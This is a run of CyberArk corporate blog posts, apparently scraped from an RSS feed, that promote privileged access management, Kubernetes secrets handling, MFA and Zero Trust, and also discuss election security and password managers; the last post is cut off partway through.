Similarly, for CyberArk enterprise customers, secrets are also pushed to the native Kubernetes secrets store – this time using Application Access Manager and based on policy.  Additionally, organizations can consistently and centrally manage secrets and credentials used by both non-human identities as well as human users, including securing interactive access to Kubernetes and other tool management consoles.

For additional information read up on CyberArk Secrets Provider for Kubernetes Secrets.

SDK Simplifies Development of Secure Kubernetes Applications

Secretless Broker, launched earlier this year, simplifies how containerized applications running in Kubernetes securely access databases, HTTPS based web applications and servers. The new SDK enables developers to write new service connectors to extend the range of databases and other external resources accessed by applications using CyberArk’s Secretless Broker capability.

With Secretless Broker, when an application needs to securely access a resource, the app simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app, fetches the required credentials from the CyberArk vault and establishes a connection to the database or other resource. With Secretless Broker, the application no longer has access to credentials, preventing them from being accidentally leaked or exposed by the application and reducing the attack surface.

This approach offers two major simplifications for developers. First, it eliminates the need for the developer to write API calls to fetch the access credential or secret from Kubernetes secrets (or any other secrets store), and second it removes the need for the application to directly handle secrets.

Secretless Broker provides development teams deploying applications in Red Hat OpenShift and Kubernetes environments with a simplified option for applications to securely access MySQL and PostgresSQL databases. The SDK enables developers to add support for additional databases and resources.

Secretless Broker is an open source project that is integrated with Conjur Open Source and offered as a fully supported feature of the Application Access Manager Dynamic Access Provider. The open source version is available from Conjur.

For additional information join the discussion on SDK.

 Improved Capabilities for Native Vaults

The integration with the Kubernetes native secrets capability, together with the previously announced integration with Ansible Tower, is part of CyberArk’s push to give developers transparent access to powerful capabilities that improve the security and ease-of-use of native secret stores with leading developer tools and platforms, including improving security capabilities such as secrets rotation based on policy and providing centralized secrets management, which removes  the burden of securing and managing secrets scattered across multiple tools and platforms from the shoulders of developers.

Additionally, enterprise versions of these integrations add improved secrets management capabilities, including enterprise class policy-based rotation, audit and other management capabilities as well as enterprise class scalability and availability.

Join the Conversation on the CyberArk Commons

If you’re interested in Kubernetes and open source, you can also join the conversation on the CyberArk Commons CommunitySecretless Broker, Conjur and other open source projects are a part of the CyberArk Commons Community, an open community dedicated to developers, engineers, cybersecurity researchers and other technically minded people. To discuss Kubernetes, Secretless Broker, Conjur, CyberArk Threat Research, join me on the CyberArk Commons discussion forum.

 

]]>
Simple Rules for Smart IAM Solutions. – Part 3: Making Sense of Data, Risk Detection and Intelligently Leveraging It https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions-part-3-making-sense-of-data-risk-detection-and-intelligently-leveraging-it/ Tue, 12 Nov 2019 18:51:22 +0000 https://www.cyberark.com/?p=99461

In part 3 of this series on Simple Rules for Smart IAM Solutions, we will examine the most efficient ways in which we can slice and dice the data collected from the various contexts which will then be used to compute risk of the various users.

In my last blog we covered the various contexts that should feed into a user behavior analytics (UBA) system to efficiently identify patterns based on which the identity and access management (IAM) solution can then determine appropriate access policies for a given identity and resource combination. Today we are going to see the most efficient ways in which we can slice and dice the data collected from the various contexts which will then be used to compute risk of the various users. In other words, we need to ask ourselves what are the minimal set of dimensions (a.k.a features/attributes) that we can reduce our dataset to, to be able to extract behavioral patterns in a reliable fashion. In data science parlance, this is often referred to as “dimensionality reduction” in order to overcome the “curse of dimensionality”. So, let’s dive in.

How do I address the curse of dimensionality?

Picking up from where we left last time, notice that I have added another box for this step of dimensionality reduction:

Simple Steps3 Image 1

Naturally, the question arising is why would we even want to go through with this? Isn’t having more dimensions going to give me more reliable behavioral patterns? These are perfectly valid questions, and the simple answer is that you actually don’t need all the features to cover the entire behavioral variance. Yes, “variance” is the key factor, and the goal is always to cover as much variance as possible, with as small number of features as possible.

To explain what I mean by variance, let’s consider an example workforce. Say the workforce is limited to one geographical location, with most employees working Monday through Friday, between 8am – 6pm, on enterprise provided devices (both mobile phones and workstations), with limited required travel. The variance (deviation from average/standard behavior) in the behavior of a typical employee for this organization would be much less when compared to a workforce which travels a lot, is spread across multiple geographical locations and has a more casual policy when it comes to devices. Establishing behavioral patterns for the first workforce would be possible with much less features than that for the latter workforce.

There are various methods available for this and one of the most popular ones is the Principal Component Analysis (PCA). As the name suggests, it helps with determining the “Principal” components required to discover patterns in a dataset, for e.g. You can find more information on this here. The below graph illustrates how much variance is covered (Y-axis) by how many PCs (X-Axis) for an example dataset.

Simple Steps3 Image2

Detecting Risk

After identifying the principal components, the main goal is to establish baselines for the users’ normal behaviors and then use one of the many methods and algorithms available to detect deviations from normal behavior. This is called anomaly detection and you can go through some of the popular methods in ML to apply anomaly detection to datasets here.

A good model should have the ability to adapt to changes in the characteristics of the data being ingested and be able to adjust the severity of the risk in a dynamic fashion. Which means there should be some concept of the degree of anomaly and the confidence with which the model is able to detect risk of various levels.

Automating Responses & Adapting to Risk

So, by now we have collected and cleaned the data, identified the key features and decided on the model to apply in order to detect risks. Now with every new data point, the solution is able to flag it as normal or attribute a risk flag to it with the right severity level. A good solution is able to take this and automate some of the following workflows and actions such that human/manual intervention is reduced to a minimum. Let’s look at some of these actions in the context of Identity and Access Management.

At a minimum the solution must be able to:

  1. Log the incident
  2. Notify relevant stakeholders through email/IM
  3. Step up access security for critical resources
  4. Define access policies for the various risk levels
  5. Provide a visual interface to visualize the threat
  6. Provide sufficient audit trail to the admin in order to investigate the incident

Advanced solutions are able to integrate responses with the following workflows and address a variety of risk-based access control decisions and actions:

  1. Integration of risk with access workflow management and other Identity Governance processes
  2. Be able to generate dynamic policies based on the risk level and all impacted resources.
  3. Be able to provide internal and external workflows that can be invoked automatically upon proper initial configurations
  4. Provide sufficient knobs to the admins to fine tune the model in order to reduce false positives.
  5. Continuously monitor user behavior and adjust the associated access policies appropriately.

What’s Next?

In the final part of this blog series we’ll double click into the automation and orchestration use cases and how they are absolutely critical in delivering on the promise of Zero Trust, but without compromising on the end-user experience. We’ll explore a couple of use cases to emphasize on the importance of connecting seemingly disparate systems and workflows (both internal and external) in order to deliver this.

Part 1 in this series

Part 2 in this series

]]>
Secure Developer Workstations Without Slowing Them Down https://www.cyberark.com/blog/secure-developer-workstations-without-slowing-them-down/ Thu, 07 Nov 2019 20:21:20 +0000 https://www.cyberark.com/?p=77263

Fueled by automation, the adoption of DevOps processes and more, the role of the developer has become increasingly important and widespread for enterprises going through digital transformation. Developers need access to privileged credentials in order to access key developer tools like Kubernetes or Jenkins admin console. These credentials can be saved locally, making developers’ workstations — whether they are Macs or PCs — high-value targets for hackers.

These workstations are often vulnerable to something as simple as a phishing email, which attackers can use as an entry point to get access to the developer’s credentials. Because of these vulnerabilities, developers’ workstations are extremely important to secure. However, developers are famous for prizing speed above all else — and seeing security as little more than a speed bump.  So how to ensure that developers take security seriously?

Securing privileged access through the principle of least privilege needs to be a top security priority. It is no secret that no-one should have full-time admin rights. But, what does that mean for developers?

Security teams face a difficult dilemma. They need to better secure developer workstations while still providing them the elevated permissions and privileges—and freedom—they need to get their job done. And they need to do all that without impacting velocity.

I recently encountered this comment on the Stackoverflow forum:

 “There is almost no legitimate operational reason for restricting admin access to local PCs for staff that need it to do their job.”

Is that true?

Developers, DevOps and other engineers all perform administrative tasks as part of their job responsibilities, so they also have “full control” of their environment. Furthermore, because of the work developers do, there are extra challenges involved in hardening and restraining their workstations regardless of whether they are using Windows or macOS.

Developers install and uninstall software, drivers and system updates. They change operating system internals and use debugging programs on a regular basis. Without full control, developers often can’t do their jobs.

However, developers have access to source code, API keys and other shared secrets – usually more access than the standard user. Compromising a developer is a quick way for attackers to gain immediate elevated access to the most essential, mission-critical information an organization has. Consequently, developers have the kind of access that attackers want, which makes them the type of user who needs the highest levels of protection – whether they like it or not.

Want to take over a company or cause reputational damage quickly? Compromise a developer endpoint.

There are even specific types of attacks designed to target developers.  For instance, “watering hole” attacks where cyber attackers will compromise common, popular developer web sites known to be good places to share code and get help troubleshooting programming issues. For example, four of the largest software developer companies in the world were compromised during a single cyber attack campaign that placed a zero-day Java exploit on an iOS developer web site.

Rights and Responsibilities

One way to deal with developers’ requests for full admin rights would be to provide them with virtual machines dedicated to programming, which could be perfectly patched and thoroughly hardened. This is doable with the right amount of monitoring and alerting, antimalware and IPS.

However, a workaround like this has a huge management overhead. It requires more budget, additional machines and another user to manage those machines.  It’s not a comfortable situation for the IT team or the developer – and let’s not forget the cost of such a solution.

Additionally, while using their development tools, developers consume a lot of computer resources (e.g. generating millions of temporary files during code compilation). This leaves the security team with the job of ensuring that no significant performance impact occurs while implementing endpoint security products – not an easy task.

Conventional attempts to counter this typically require system administrators or security staff to perform manual inspections and craft security policies in response. As application complexity and development velocity increase, it becomes impractical to determine least privilege ahead of time manually. Furthermore, a central policy gatekeeper won’t scale efficiently and is likely to negatively impact delivery velocity.

Cutting the Gordian Knot

There has to be a better way to balance the needs of the developer with security concerns. Organizations need to be able to remove administrative privileges from developers without preventing them from doing their jobs, reducing velocity or overburdening security teams.

CyberArk Endpoint Privilege Manager can overcome these obstacles, allowing organizations to remove privileged credential rights on Windows workstations, servers and MacOS. It provides privileged access management (PAM), allowing enterprises to easily remove local Admin users – including developers. For instance, CyberArk Endpoint Privilege Manager can elevate specific applications used by the developer on a day-to-day basis or provide just-in-time user elevation for a specified time while recording and logging all user activity.

In addition, since developers may save credentials to their development environments, Endpoint Privilege Manager protects those repositories from credential theft while allowing trusted applications to use the credential stores.

Another key feature for the developers use-case is the out-of-the-box predefined policies for different developer tools like visual studio, Eclipse, Git and others.

Secure developer workstations with least privilege

Final Thought – The Developer Resistance

Each new security-driven restriction impacts the developer productivity throughout the entire software development process. Consequently, developers may fight the rules and restrictions necessary to maintain a strong security posture. What makes Endpoint Privilege Manager any different?

Endpoint Privilege Manager minimizes interference in the developer workflow. Developers – and other users – don’t need to go through the extra step of involving an administrator when they need access to certain applications. For a predefined, approved set of applications, users can seamlessly gain access through an automated process.

Furthermore, Endpoint Privilege Manager allows users to elevate privileges to access these approved applications while continuing to access other, unapproved applications as non-privileged users. This means that developers can continue to access the majority of the applications they use on a  daily basis without having to slow down – without losing out on the benefits of application security.

Developers are like builders constructing a house on an empty lot. They need to be armed with the best tools to do their best work. If you give them old equipment, they will spend more time working around it than actually building. Endpoint Privilege Manager lets developers do what they do best – without interrupting their workflow with compliance and security requirements – so that they can write code faster.

Developers don’t need to be the last hold out for administrator rights within an organization. Learn how this is possible today.

]]>
Why Worrying About Election Security Only During Election Season Is Part of The Problem https://www.cyberark.com/blog/why-worrying-about-election-security-only-during-election-season-is-part-of-the-problem/ Tue, 05 Nov 2019 18:55:43 +0000 https://www.cyberark.com/?p=99486

Year-round awareness and careful communication, coupled with common sense cybersecurity practices like multi-factor authentication and a Zero Trust perimeter, are the best defense against the fluid combination of varied attacks, evolving vulnerabilities, and human error that comes into play during elections.

“But what about her emails!”

It’s become an unfortunate joke now, but the 2016 presidential election was mired in a seemingly unrelenting string of scandals centered around personal online habits and cybersecurity. While opponents harped on about Hillary Clinton using her personal email for political use – and thus potentially endangering sensitive data – you also had the tangential but related story of John Podesta, former White House Chief of Staff and chair of Clinton’s campaign. He was compromised in a data breach and had thousands of emails – many relating directly to the campaign – stolen in what amounted to a run-of-the-mill phishing attack and simple human error that could have affected any number of non-political businesses or personal accounts.

But while a lot of the noise around these stories was bluster and political posturing, the specter of cybersecurity breaches shaping a presidential election was raised, perhaps permanently. Data can be placed in jeopardy in a myriad of ways, even without hackers actively looking for it. Is election security even possible given the sheer amount of vulnerabilities?

It Can’t Be Just an Election Season Concern

This is why a discussion about election security is really no different from any other conversation about the threats that face all individuals or businesses. It’s also why the notion of election security doesn’t – or shouldn’t – just bubble up when an election is near. It’s a year-round concern, one complicated by numerous vulnerabilities.

And that’s because hackers aren’t necessarily interested in changing votes. Although that very idea was floated as part of Special Counsel Robert Mueller’s investigation into the 2016 election, the results were inconclusive. As Philip Bump wrote in the Washington Post regarding the Mueller probe, “It may be — and appears to be — true that Russia didn’t manipulate actual voting results, changing a county’s pro-Clinton votes into pro-Trump ones…But Russia’s efforts absolutely affected the vote, as they were intended to…”

By “as they were intended to,” Bump is referring to how the registered voter data that hackers collect can be used to sway opinion and affect votes through hyper-targeted misinformation campaigns. By engaging in this scary new kind of digital gerrymandering, hackers can feed incorrect voting dates or false voting locations in an effort to prevent people from reaching the polls at all. In a 2018 Fast Company article titled “How Facebook Blew It,” Alex Pasternack and Joel Winston wrote, “The [Trump] campaign would use Facebook in uglier ways too. Days before the election, Bloomberg reported, the Trump team was rounding out a massive Facebook and Instagram ad purchase with a ‘major voter suppression’ effort. The effort, composed of short anti-Clinton video ads, targeted the ‘three groups Clinton needs to win overwhelmingly . . .  idealistic white liberals, young women, and African-Americans’ with ads meant to keep them from voting.”

And yet, adding or removing votes remains a common misconception when the subject of election security is broached. Election hackers are after personal data. There is always danger around centralizing too much data, and elections amplify this threat by offering a window during which massive amounts of personal data for large swathes of the country are gathered and recorded. In the 2016 election, according to a report in Bloomberg News, hackers hit at least 39 states, with breaches into software systems and voter databases. In Illinois, detectives found proof that intruders tried to delete or otherwise alter voter data. In at least one state, hackers accessed a campaign-finance database.

This is why “election security” is such a frustrating issue in a lot of ways. It’s nearly impossible to police at a high level, especially when you’re dealing with the existential threat posed by social platforms like Facebook. How do you prevent the formation of an opinion based on misinformation? The truth is, you can’t – but you also don’t stand a fighting chance of limiting the potentiality if you only begin to act a few weeks before an election, or if you hope some “other” will fix the problem without any changes on everyone’s part.

Be Aware and Be Active

Election cybersecurity needs active participation from everyone. Waiting for someone else to Band-Aid the problem and guarantee a 100% secure election is folly. There are simply too many factors at play here. Year-round awareness and careful communication, coupled with common sense cybersecurity practices like multi-factor authentication and a Zero Trust perimeter, are the best defense against the fluid combination of varied attacks, evolving vulnerabilities, and human error that comes into play during elections. And when we refer to awareness and communication, we don’t mean between campaign managers and their IT personnel. We mean everyone. Get involved, because it’s the only way to ensure every county, precinct, and state is doing what they can. Each state manages its own elections, and we’re all only as strong as our weakest link.

So the call to action is simple: Contact your state and local representatives and ask them these three questions:

  • Do they have multi-factor authentication turned on for all email services, devices, and any system or application that manages voter registration or other constituent data?
  • Do they have proper access controls in place, and can they prove that only allow authorized individuals access to voter and other constituent data?
  • What proactive measures do they have in place to ensure that proper and vetted voting information (like polling dates and locations) are reaching their constituents?
]]>
How Do You Prioritize Risk for Privileged Access Management?  https://www.cyberark.com/blog/how-do-you-prioritize-risk-for-privilege-access-management/ Tue, 05 Nov 2019 16:07:15 +0000 https://www.cyberark.com/?p=76767 Privilege Access Management (PAM) Risk Prioritization

For many organizations implementing privileged access management (PAM) has become high on the priority list – and for good reason.  Privileged access is the route to an organization’s most valuable information and assets and protecting them is paramount.

However, many organizations lack visibility into where privileged accounts, credentials and secrets exist. The privilege-related attack surface is often much broader than anticipated. So before you get started with any PAM deployment, there’s one big question you need to answer: How Do You Prioritize Risk?

 Here are a few steps that can help:

1. Identify all privileged accounts and credentials. Depending on how many IT assets (systems, databases, applications, SaaS, cloud providers and DevOps tools) you have, there may be tens, hundreds, thousands, or even hundreds of thousands of privileged credentials and secrets across your environment. How can you protect what you don’t even know you have?

The first step to prioritizing risk is to scan and identify all of the privileged accounts and credentials (passwords, SSH keys, passwords hashes, AWS access keys and more) in your environment—on-premises, in the cloud, at the endpoint and across DevOps processes—to understand the scope of potential exposure.

2. Classify types of privileged access by risk. During or after the inventory process, you need to determine a method to evaluate risk. Since you cannot fix everything at once, it’s best to take a risk-based approach, tackling the riskiest areas first and then expanding to new areas over time. Some examples of risk-based prioritization may include identifying:

  • Your organization’s most critical systems (using risk classification system or risk-rating mechanisms)
  • Systems that contain data that needs to be secured due to regulatory requirements
  • Systems with intellectual property or customer data
  • Known vulnerable systems (if issues have already been identified from audits, penetration tests or Red Team exercises)

Most organizations start by identifying a small set of accounts that are relatively easy to pinpoint and present high risk and then conduct a Sprint to implement critical privileged access controls in a short period of time (i.e., 30 days). Then, over time, the organization expands coverage to new phases, adding controls to more accounts.

3. Protect the riskiest accounts first to avoid network takeover attacks. In most cases, organizations focus initial efforts on securing tier0 and tier1 critical assets, such as domain administrator accounts and administrator accounts with access to large numbers of machines, particularly servers, as well as application accounts that use domain administrator privileges.

Because cyber attacks that reach the domain controller level can lead to a hostile takeover of network and assets, attackers are starting to apply this approach to new environments, targeting cloud consoles and orchestration tools. Attackers who gain this level of privileged access can control any server, controller, endpoint or piece of data, anywhere on a network.

Regardless of environment, all privileged access to tier0 and tier1 assets should be isolated, all admin credentials should be placed and rotated in a digital vault protected with multi-factor authentication (MFA) and access should be continuously monitored. You should also ensure that there are no hash residuals by design and you are able to detect and block in-progress attacks on domain controllers.

4. Control and secure your infrastructure accounts. Next, many organizations turn their attention to securing and managing the powerful default infrastructure accounts that exist on-premises and in cloud and DevOps environments. Once attackers get their hands on these accounts, they can take ownership of the entire technology stack by compromising a single, unprotected infrastructure account with a default and unchanged password. The same credentials can be used to access similar assets.

Work toward managing 100 percent of these accounts using secure processes and a PAM solution that consistently and securely manages these accounts. All well-known infrastructure accounts should be vaulted and privileged sessions should be isolated and recorded to minimize risk.

5. Limit lateral movement by protecting privilege at the endpoint. Every single workstation in an organization contains privilege by default. Built-in admin accounts allow IT to fix issues locally, but create a massive security gap that attackers target and exploit. Attackers can exploit these risky systems by getting in and then jumping laterally from workstation to workstation until they reach what they are looking for.

It’s important to implement least privilege and just-in-time elevation and access and also remove local administrative rights from workstations. Without strong endpoint security, attackers can easily move laterally into—and around—the network.

6. Protect credentials for third-party applications. For systems to work together, they have to be able to access one another. That’s why the number of machines and applications that require privileged access vastly outnumber people in most organizations today. These non-human entities are difficult to monitor, keep track of or even identify.

Plus commercial off-the-shelf (COTS) apps typically require access to various parts of the network, which attackers can exploit. Remember—you are only as strong as your weakest link.

All privileged accounts used by third-party applications should be centrally stored, managed and rotated in a digital vault. Additionally, all hard-coded credentials should be removed from COTS applications to minimize risk.

7. Manage *NIX SSH Keys. SSH keys are pure gold to a hacker or malicious insider, as they can use unmanaged SSH keys to log in with root access and take over the *NIX (Linux and Unix systems) technology stack. Unix and Linux systems house some of an enterprise’s most sensitive assets and Linux is a commonly deployed operating system in cloud environments. Yet individual privileged accounts and credentials—including SSH keys—used to gain root privileges are often overlooked by security teams.

8. Manage DevOps Secrets in the Cloud and On-Premises. For organizations embracing DevOps technologies, it’s important to dedicate a phase to securing (and then continuously managing) the credentials and secrets used by DevOps tools (i.e., Ansible, Jenkins and Docker) and Platform as a Service (PaaS) solutions (i.e., OpenShift and Pivotal Cloud Foundry).

Make sure these credentials and secrets can be retrieved on the fly and are automatically rotated and managed. This essentially means that your code should be capable of retrieving the necessary privileged credentials from a PAM solution instead of having them hardcoded into an application. Policies for rotating secrets also greatly reduce the risk of secrets becoming compromised.

9. Secure SaaS Admins and Privileged Business Users. Too often, Software as a Service (SaaS) and privileged business users can be forgotten in prioritization efforts. Yet, cyber criminals will steal credentials used by SaaS administrators and privileged business users to get high-level and stealthy access to sensitive systems.

Examples of business critical SaaS applications can be anything from Customer Relationship Management (CRM) software to applications used by the finance, HR and marketing teams. Privileged business users with access to these types of applications can perform very sensitive actions, such as downloading and deleting sensitive data. To prevent this kind of attack, isolate all access to shared IDs and require MFA. Also, monitor and record the sessions of SaaS admins and privileged business users.

While there is no one-size-fits-all approach to security, implementing these steps can help your organization achieve greater risk reduction in less time and satisfy security and regulatory objectives with fewer internal resources.

To learn more, read our eBook, Privileged Access Security for Dummies.

]]>
Passwords Need Fixing. Adaptive MFA Everywhere is the Solution. https://www.cyberark.com/blog/passwords-need-fixing-adaptive-mfa-everywhere-is-the-solution/ Mon, 04 Nov 2019 20:49:51 +0000 https://www.cyberark.com/?p=98927

Ask an average person to identify the most common cause of data breaches and they are more likely than not to echo the terrifying headlines they’ve read about: sophisticated state-sponsored attacks, stolen NSA tools, or zero-day flaws in popular operating systems. Yet, the truth is that stolen, weak, or default passwords are actually to blame most of the time.

In fact, research clearly shows too many apps are secured by passwords alone. While improvements have been made to how we use and secure passwords today (I’ll touch on those below) the fact remains average business users now manage upwards of 200 passwords. For businesses, it’s a delicate balance: one-step authentication makes it simple for unwanted guests to slip through, gain access and infiltrate systems. But introduce too many onerous security steps, and then users rebel and find workarounds — or worse, avoid work altogether. That’s how corners get cut. So, what’s the answer?

Read our blogs and it’s already known: a Zero Trust strategy enabled by Next-Gen Access technology. Next-Gen Access can’t remove all security steps on the user’s log-in path, but it can choose when (and how much) friction needs to be applied to either let that user pass through easily or take further action to confirm their identity.

Previously, I wrote that the core principle guiding Zero Trust is to “never trust, always verify” and that starts with users. But how do organizations take those critical first steps toward improving security posture? Let’s break down how to verify every user in the Zero Trust approach.

Apply MFA here, there, and everywhere

It’s no secret that multi-factor authentication (MFA) is the single best line of defense against unwanted guests wielding compromised credentials. Yet, it’s not widely deployed. Why not? Well, the short version is that it has traditionally been complex to use and hard to integrate – making it a burden to end users and IT.

At its core, MFA requires at least two of three different factors to verify user authenticity: something you know, something you have, and something you are. An example of “something you know” is a pin code or secret question. “Something you have” is a prompt to another device in the users’ possession such as a key fob that generates a one-time code, or a USB key, smart card, or smartphone. Last but not least, “something you are” is a bit more sci-fi and includes biometrics like an iris scan or thumbprint.

The big issue holding back the adoption of MFA is that these capabilities are not applied consistently across apps and services we use. For example, many of us have multiple financial accounts for banking, credit and investments. We enable MFA for each, but they all use different approaches and we have to know how to do each one otherwise we’re locked out. That’s a pain.

So, we do it because in a few places because we’re afraid of being breached, not because it’s an ideal user experience and limits more extensive use. However, the cybersecurity industry, including companies like Idaptive, has spent hundreds of millions of dollars to improve MFA for a better out-of-the-box experience for business. By providing a consistent, approachable, and secure login experience across all apps and devices businesses can enforce MFA everywhere in their organization without placing a burden on IT or exposing a less than optimal experience to end users.

Still, extra steps from MFA, no matter how smooth the user experience, can lead to adoption issues through added friction that frustrated users. For a truly Next-Gen Access approach, MFA needs to be combined with other features to improve users’ productivity rather than hinder it.

Shine the spotlight on single sign-on

This is where single sign-on (SSO) comes into play. SSO saves users hundreds of hours managing logins and saves businesses millions of dollars when it comes to productivity. Alone, as SSO has traditionally been sold to enterprises, it is a double-edged sword that greatly reduces an organization’s attack surface — but also may increase the impact of a breach because of the centralized access it offers to users. SSO, when combined with MFA, becomes much safer and incredibly powerful.

Only needing to sign-in once eliminates the need to enter passwords and send them across networks. At the same time, when integrated with another security step through MFA, businesses need not worry that a single password unlocks the keys to the kingdom. With multi-step verification, additional layers of security reduce the attack surface by an order of magnitude.

It’s not perfect though. There’s one final ingredient — the cherry on top of the cybersecurity pie — that Next-Gen Access technology provides to Zero Trust adopters.

Leave it to Behavior (-based access)

Together MFA and SSO allow for a much higher degree of confidence for security, but we still can’t trust that every user is who they say they are without the right context. Access decisions are simple when it comes to recognized devices and networks, but what happens when someone attempts a login from a new laptop or remote location? And for enhanced protection, you may choose to prompt users more often than necessary for MFA because you want to err on the side of security rather than convenience.

In a Next-Gen Access approach to Zero Trust, context is what determines whether to add friction to that user’s path. When an employee uses their recognized device, during their normal routine or hours, from their usual locations, access systems and apps they always use — then we don’t add friction. However, if someone is not doing those things, then we restrict or block that access until the user can verify that they are, in fact, who they say they are.

In the past, rules like this had to be written for each individual by IT teams. Often a herculean, if not impossible, effort. Take for example the accountant that works every day from headquarters, on the corporate network, using the same laptop, and uses the same three applications from 9-5. We could write a rule for any user that is on the corporate network, using a known device, accessing a familiar app, during office hours should be allowed silent sign-on without extra steps. But what about the salesperson traveling up and down the coast, never on the corporate network, using their own device from a Starbucks to access Salesforce.com. That would obviously require some more rules. Taken to the extreme, you would need rules for every individual user. Something IT is loathe to do and often gives up and just adds friction for everyone.

Today, however, Idaptive does the heavy lifting using machine learning to understand and assess user behavior, develop a unique behavior model for each of them, and then make intelligent access decisions in real-time based on risk. Your IT organization only has to determine what is required based on the risk level if this user is not acting according to their own behavior profile.  This is the benefit of behavior-based access technology – the ability to automate access decisions and greatly reduce the attack surface, eliminate the IT burden of managing myriad rules, while at the same time not destroying the spirit of the user.

Security improvements should always be balanced against the end user experience, whether that’s a customer, partner, or employee. There must be a consistent way for these people to discover and access their apps, alongside an intelligent approach to limit or increase friction based on risk level.

Passwords are just one piece of the cybersecurity puzzle. Any device that has access to your systems needs to have trust established just as the user does. In my next blog post, I’ll dive into the ways organizations can “validate every device” as part of their Zero Trust strategy.

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Are Password Managers Good Enough to Protect You? https://www.cyberark.com/blog/are-password-managers-good-enough-to-protect-you/ Thu, 31 Oct 2019 17:11:14 +0000 https://www.cyberark.com/?p=76589 Password Manager

October is National Cybersecurity Awareness Month and, over the past few weeks, we’ve written blogs highlighting this year’s themes: Own it. Secure it. Protect it. We wrote about the opportunity and risk of emerging technologies like 5G and IoT and the rise of biometrics as a way to increase account security.

For Protect It we’re diving into the world of password management. Whether it’s for work or personal use, chances are you have a ton of different passwords – and some that may even give you access to sensitive accounts and critical systems.

There’s an even bigger chance that those passwords are relatively simple and easily guessed by attacker. And you might be using the same password over and over. In that case, if an attacker cracks your password for one system, they can compromise every other system where you use that password.

Or maybe you use multiple, hard to guess passwords – but to save time and brainpower you save the credentials in your browser’s built-in password manager. Most popular browsers like Chrome, Safari, Firefox, Internet Explorer and Opera offer built-in password managers that store and auto-fill website passwords when you need them. The simplicity makes this a compelling option. But, is it the best way protect the data you care about most?

Despite the convenience, there is a major downside to saving credentials in a browser. Because so many people use integrated password managers, they are a natural target for credential theft attacks. Cyber attackers count on us choosing convenience over security and credentials saved in a browser are a super easy target. Credential theft attacks can be fully executed from a single user’s workstation by leveraging passwords for social media accounts and other credentials stored on the device.

So, what should you be using to better protect your online passwords and secure your digital life?

Dedicated Password Managers: The Good and the Bad

Dedicated password managers allow you to save, generate and update all of your passwords in one encrypted location protected by a single, strong password or passphrase. These tools are increasingly popular among consumers and enterprises alike, but as with most tools and technologies, they don’t completely eliminate security risks. Here are a few best practices to help you safeguard your dedicated password manager:

  1. Be on the lookout for phishing attempts.According to the Verizon DBIR 2019, phishing was involved in 32 percent of confirmed breaches as well as 78 percent of cyber-espionage incidents. It’s important to stay vigilant and never click on links or open attachments from people you do not know or ones that seem out of character.
  2. Always use multi-factor authentication (MFA).Ensure that multiple types of authentication methods – not just a password – are required to unlock the account. This is important not only for your dedicated password manager, but for other online services like your bank account, email and social media accounts.
  3. Choose a strong master password.Your master password is the key to unlocking every single online password stored in the repository.  The US National Institute of Standards and Technology (NIST) recently updated recommended standards on password security – hopefully removing some of headaches for users while working to improve security. Noteworthy elements of the guidelines include recommendations for users to select longer, memorable passphrases without complex construction rules. NIST now only recommends password resets in cases where there is a suspected threat versus, rather than having scheduled resets.
  4. Use different passwords for every online account.Don’t reuse passwords on multiple sites or accounts – even if it’s a strong password. If you do, and one account is hacked, the others can easily be compromised as well. Every time you create a new password for an online service, be sure to make it unique. Password managers can also act as password generators and create a unique password for you.

Dedicated password managers are a viable option for individual users and can help strengthen the security of their machines and digital information. But, when it comes to securing a business – it’s best to look for solutions purpose-built for enterprise requirements.

Password manager only manage the passwords of a single person – which is great when the only one you’re securing is you. But, businesses are comprised of many people and, often, those people have different needs when it comes to system access. A password manager can’t manage who gets access to what.

However, an enterprise-level solution can ensure that no person has access to more than they need – preventing cyber attackers from using a compromised account to go straight for the most vital information. The extra ingredient that this type of enterprise-level solution provides is privilege access management (PAM) – a cybersecurity strategy for controlling, monitoring, securing and auditing everyone and everything in an IT environment.

Password managers are a big step up from trying to memorize all of your passwords yourself – or letting your browser (or a post-it note) remember them for you. They can save you time, increase your security and free up a lot of mental clutter. But, if you’re trying to handle access on the scale of a business, you need privileged access management.

 

]]>
Privileged Access Management as a Service: Why It Matters https://www.cyberark.com/blog/privilege-access-management-as-a-service-why-it-matters/ Tue, 29 Oct 2019 13:00:08 +0000 https://www.cyberark.com/?p=76410 Privileged Access Management (PAM) as a Service

Privileged access is the gateway to an organization’s most valuable assets. Nearly all advanced cyber-attacks exploit privileged accounts. Leading analysts and security professionals agree: Privileged Access Management (PAM) is a critical initiative.

However, many organizations still don’t have a plan in place to secure privileged accounts, credentials and secrets. This disparity is often due to organizations believing that they do not have, or do not think they have, the resources to effectively and efficiently manage a PAM solution.

Security teams are finding themselves in a similar predicament to businesses shifting their data centers and computing to the cloud. Both security teams and businesses alike want to reduce cost, improve computing strength and address the lack of internal resources that makes managing on-premises infrastructure difficult. For example, recently, there has been a dramatic shift toward commercial off-the-shelf software (COTS) being deployed as Software as a Service (SaaS).

One of the major challenges facing organizations is a shortage of trained security and IT staff. It’s hard enough for organizations to stave off the rising number of attacks. Harder still is maintaining a strong cybersecurity posture without enough of the right people on your team. This forces organizations to make tough decisions on what tools they can utilize and manage.

